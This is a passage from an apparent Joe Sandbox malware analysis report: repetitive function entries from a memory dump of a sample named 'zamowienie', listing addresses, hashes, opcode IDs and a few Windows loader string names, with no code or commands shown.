                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: f6f8cdec45e78f53e17bc796801cd1259059434398f6a5d1bfb0ba6ce056d644
                                                                                                                                              • Instruction ID: 44909ba7375d9955c16bf149da4cdbc92f3e0694e85ecbce784fa2e7f4f6d9b9
                                                                                                                                              • Opcode Fuzzy Hash: f6f8cdec45e78f53e17bc796801cd1259059434398f6a5d1bfb0ba6ce056d644
                                                                                                                                              • Instruction Fuzzy Hash: DE318C35715A46FFE7858B24DE40E99BBA6FF84350F585469E81087B61DB32E832CBC0
                                                                                                                                              Function 34EF3616 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 548ef1024caef563f0736a0956386d479d51d53b10cd8d9a34c26be6d0c9ec80
                                                                                                                                              • Instruction ID: ea1300dfc04c073a2877c427e65679a0f9db9b06e4fb0b9ef877230c8c71d238
                                                                                                                                              • Opcode Fuzzy Hash: 548ef1024caef563f0736a0956386d479d51d53b10cd8d9a34c26be6d0c9ec80
                                                                                                                                              • Instruction Fuzzy Hash: 6E21DF75205654DFE721DF04CD44B2ABBA5FF81A19F8B4D6DE8404B690CA32EC85CF92
                                                                                                                                              Function 34F01CC7 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 56604ba4744362791d84ded5640b5c0376fcaf058d7c771c00132ffe5ae7a6be
                                                                                                                                              • Instruction ID: 83b6e83a0b112eaadc07c8e6bcc25f1016c130184da74c755f38f33c093e9b9e
                                                                                                                                              • Opcode Fuzzy Hash: 56604ba4744362791d84ded5640b5c0376fcaf058d7c771c00132ffe5ae7a6be
                                                                                                                                              • Instruction Fuzzy Hash: 24217C36701B009FE721DB28C944B56B7E5FF88714F18896DE992876A0DB71A802DB90
                                                                                                                                              Function 34F0DDB1 Relevance: 1.6, APIs: 1, Instructions: 62timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 20711350032eddc65c9c4964f51e509eaca078cb5234cf6eb6e6a39188d270f0
                                                                                                                                              • Instruction ID: 489fe9d7b294b43941799114eecbcb57093f7cbfe51fa69279d5b3ce4d88d4d3
                                                                                                                                              • Opcode Fuzzy Hash: 20711350032eddc65c9c4964f51e509eaca078cb5234cf6eb6e6a39188d270f0
                                                                                                                                              • Instruction Fuzzy Hash: 3721D3B6602388DFEB028BA8C940BDDBBA5FF45744F0848A9E5009B391C7798D02DB65
                                                                                                                                              Function 34EE92FF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DebugPrintTimes
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3446177414-0
                                                                                                                                              • Opcode ID: 2af4e52a256471b98df62b373aad675423fd35c267122d39ea904cbf2917c2b6
                                                                                                                                              • Instruction ID: 998e9b04353c98068190a772d0600494e9667d500b1ee6defbf5e2d8116e2a4f
                                                                                                                                              • Opcode Fuzzy Hash: 2af4e52a256471b98df62b373aad675423fd35c267122d39ea904cbf2917c2b6
                                                                                                                                              • Instruction Fuzzy Hash: 52F0F032100740AFD3319B09DC04FAABBEDEF84704F08051CA582931A0C6A1A945CA60
                                                                                                                                              Function 34FC16A6 Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: W
                                                                                                                                              • API String ID: 0-655174618
                                                                                                                                              • Opcode ID: db62ce23067a8b528249f38faf4a7fcef82aa77984b38c303ef29a8f709e566a
                                                                                                                                              • Instruction ID: 8feebb610a0060fdefad4503b35594ea37d3eebeb1389addbeca443363886c47
                                                                                                                                              • Opcode Fuzzy Hash: db62ce23067a8b528249f38faf4a7fcef82aa77984b38c303ef29a8f709e566a
                                                                                                                                              • Instruction Fuzzy Hash: EAA149B5E0172ACFEB21DF14CA807D9B7B1AF49305F1849E9D849A7240D7349EA6CF80
                                                                                                                                              Function 34EF973A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                                              • Instruction ID: 7774b3b1ca635d8f1e6e6ffffc75a7e6ed9298c6e9e8548acf5bb5ea1ca0fed7
                                                                                                                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                                                                                                                              • Instruction Fuzzy Hash: 336189B5D01259EFEB11CFA5D840B9EBBB8FF80754F56466AE810A7290D7319A01CFA0
                                                                                                                                              Function 34F73CDB Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: CWDIllegalInDLLSearch
                                                                                                                                              • API String ID: 0-473384322
                                                                                                                                              • Opcode ID: d7fdf7ec702a63b638367fc0516ae6777c170816937e23146d84d6f0f693f6fb
                                                                                                                                              • Instruction ID: c4717c376beab72eb4092d6e1325e2b1d82e30714f585c35ea98fe6de27daba7
                                                                                                                                              • Opcode Fuzzy Hash: d7fdf7ec702a63b638367fc0516ae6777c170816937e23146d84d6f0f693f6fb
                                                                                                                                              • Instruction Fuzzy Hash: 6B5190B6904706AFE311CE14D841B5ABBE8EF447A0F484E2EF950D7290D738D95ACBD2
                                                                                                                                              Function 34F7F7AF Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 0-2766056989
                                                                                                                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                                              • Instruction ID: d37c0b7ef577876260df244d2b68180971f3c3b82b9ac7a91dfe292f2b8d4353
                                                                                                                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                                                                                                                              • Instruction Fuzzy Hash: 7051ACB2615305AFE7118F14C840F6ABBE8FF84794F48092EF59097290D778ED06CBA2
                                                                                                                                              Function 34FAB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: PreferredUILanguages
                                                                                                                                              • API String ID: 0-1884656846
                                                                                                                                              • Opcode ID: 1d4e4430e80ad8e2c819475597d310cb5035fc174ab52830271699c25b6bbdbd
                                                                                                                                              • Instruction ID: b57c895f6b2478c3115fbe6d03b77666402ef2844c6bdf247aad798e09d0d3d5
                                                                                                                                              • Opcode Fuzzy Hash: 1d4e4430e80ad8e2c819475597d310cb5035fc174ab52830271699c25b6bbdbd
                                                                                                                                              • Instruction Fuzzy Hash: 5F41D47A91031AEFDB11CB94C850AEEB7B9EF44750F09496AEA01E7250D630DE42CBA0
                                                                                                                                              Function 34F797A9 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: verifier.dll
                                                                                                                                              • API String ID: 0-3265496382
                                                                                                                                              • Opcode ID: 67c4ae4c91cd4402066c65e1b325b8acb71974eb5b2a1d9b486908d0c6a74d40
                                                                                                                                              • Instruction ID: d90a66ad74c778f246701fb6f164afba5ff9407e252ab1de618d1b7008fa5041
                                                                                                                                              • Opcode Fuzzy Hash: 67c4ae4c91cd4402066c65e1b325b8acb71974eb5b2a1d9b486908d0c6a74d40
                                                                                                                                              • Instruction Fuzzy Hash: 6F3183B5A103019FE7148E68D850E367BE6EF48391FD8987EE544DF281E6398C828F94
                                                                                                                                              Function 34F2BC3B Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrpInitializeProcess
                                                                                                                                              • API String ID: 0-2689506271
                                                                                                                                              • Opcode ID: df68ed125751fffdac83d1c5c5f8252a0054b11543c9b8a5f5fac5fb60484ce5
                                                                                                                                              • Instruction ID: 9e46998ef424c9ac3c92f8d26f67d4d81d9de9e79d8720fafe66e2da06670d39
                                                                                                                                              • Opcode Fuzzy Hash: df68ed125751fffdac83d1c5c5f8252a0054b11543c9b8a5f5fac5fb60484ce5
                                                                                                                                              • Instruction Fuzzy Hash: 76411376115304EFE311CE50D944AABB7ECEB84754F484D2FF5A192140D7B8E986CF92
                                                                                                                                              Function 34F27505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: #
                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                              • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                              • Instruction ID: d00559ed4371fc20b36a3b365048a8c4c97877154d53cd6904ba3ce7aea13c68
                                                                                                                                              • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
                                                                                                                                              • Instruction Fuzzy Hash: F5418F7AA00616EFEB11DF44C491BBEF7B5EF84745F08485AE941AB240DB34D942CBA1
                                                                                                                                              Function 34F236EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Flst
                                                                                                                                              • API String ID: 0-2374792617
                                                                                                                                              • Opcode ID: b2f166292c6875470f7996ea4034f131bec7e7330c9ddc74f80728e12a9cd51d
                                                                                                                                              • Instruction ID: 0b5fa6a021127c3612bbbea0b7c346f1ec1564adb674e3764ad3c0e4477b95a9
                                                                                                                                              • Opcode Fuzzy Hash: b2f166292c6875470f7996ea4034f131bec7e7330c9ddc74f80728e12a9cd51d
                                                                                                                                              • Instruction Fuzzy Hash: 7741ABF9209301DFD704CF28C480A16FBE8EB49754F59896EE8498F241DB35D943CB91
                                                                                                                                              Function 34EF3DD0 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Pl4
                                                                                                                                              • API String ID: 0-3511680795
                                                                                                                                              • Opcode ID: 437c316c13bd141c874acc75ad7733912fa7ec04474b32e44f758a7a8f253331
                                                                                                                                              • Instruction ID: 5c586f6df4f8737404c60d0170be206b61988d307145241f450a34eb28b331c3
                                                                                                                                              • Opcode Fuzzy Hash: 437c316c13bd141c874acc75ad7733912fa7ec04474b32e44f758a7a8f253331
                                                                                                                                              • Instruction Fuzzy Hash: D8318BB6A00708DFEB10CF59C840B9EB7B1BF84764F168959E8159B390C776D942CF90
                                                                                                                                              Function 34EF5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Actx
                                                                                                                                              • API String ID: 0-89312691
                                                                                                                                              • Opcode ID: 4172772e8dd00a56a1f9908708e0b0743b440592a4dcc425939d7890cc537b0c
                                                                                                                                              • Instruction ID: 9196b00adfc7da8953b5b540f655bd5e7289632f70f32ffcb153d1f2bd3339c3
                                                                                                                                              • Opcode Fuzzy Hash: 4172772e8dd00a56a1f9908708e0b0743b440592a4dcc425939d7890cc537b0c
                                                                                                                                              • Instruction Fuzzy Hash: F3118E74308B028BF7944D198C50616B399EBA226CF36866EE871CB392DE73E8418380
                                                                                                                                              Function 34F7106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: LdrCreateEnclave
                                                                                                                                              • API String ID: 0-3262589265
                                                                                                                                              • Opcode ID: 5b56ad971feb1b571aaf6e98432ca2f89c1891d5f9125e97f4c3e3170982f53e
                                                                                                                                              • Instruction ID: d4d2f5d8255f57dbd10cbcdca662dc298d18395aae1a4a808a53b7a99825f223
                                                                                                                                              • Opcode Fuzzy Hash: 5b56ad971feb1b571aaf6e98432ca2f89c1891d5f9125e97f4c3e3170982f53e
                                                                                                                                              • Instruction Fuzzy Hash: 902140B19183449FC310DF6AC805A5BFBE8AFD5B80F400A1FB9909A350D7B5D84ACB92
                                                                                                                                              Function 34F4739A Relevance: .7, Instructions: 705COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 2e7da8df9a7ca36a2fc2befc1eb80ab76bbb91480b339036f53a2759aec1e558
                                                                                                                                              • Instruction ID: bd3e680e79d8ddf4ab2ec813ed1fc643e2e12c8b78973b7bdf5ae0b5a83f72f3
                                                                                                                                              • Opcode Fuzzy Hash: 2e7da8df9a7ca36a2fc2befc1eb80ab76bbb91480b339036f53a2759aec1e558
                                                                                                                                              • Instruction Fuzzy Hash: 9E429F75A00616CFEB04CF59C8806AEBBF6FF88354B68895DD455AB390DB34E843CB90
                                                                                                                                              Function 34F1B2C0 Relevance: .6, Instructions: 629COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c6cbf6b6f973158b7a3fe618abb52146d615ae52cda5c3de9720aa9ec3fc6713
                                                                                                                                              • Instruction ID: 9fcd1cfb90163c4af64d203281e42dd8e654703736d921745afbd3d55204b618
                                                                                                                                              • Opcode Fuzzy Hash: c6cbf6b6f973158b7a3fe618abb52146d615ae52cda5c3de9720aa9ec3fc6713
                                                                                                                                              • Instruction Fuzzy Hash: B232D1B6E01219DFDB14CFA8C880BAEBBB5FF54754F18446DE805AB390E7359912CB90
                                                                                                                                              Function 34FB16CC Relevance: .6, Instructions: 571COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000003.00000002.2969264862.0000000034EC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 34EC0000, based on PE: true
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.0000000034FED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              • Associated: 00000003.00000002.2969264862.000000003505E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_3_2_34ec0000_zamowienie.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a087d4745e8777700d6a5220a365ecdb44bac4d8d1c84b5cc438a063e01bcec4
                                                                                                                                              • Instruction ID: ac99d183902b3438f42681f909f52394518ef0fb25f9877b6f87f108552c8fb4
                                                                                                                                              • Opcode Fuzzy Hash: a087d4745e8777700d6a5220a365ecdb44bac4d8d1c84b5cc438a063e01bcec4
                                                                                                                                              • Instruction Fuzzy Hash: 5E22A375B00215CFDF09DF5AC59066AB7B2BF8A384B28896DD496DB344DB30E943CB90
                                                                                                                                              Function 34EFD7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              Memory Dump Source
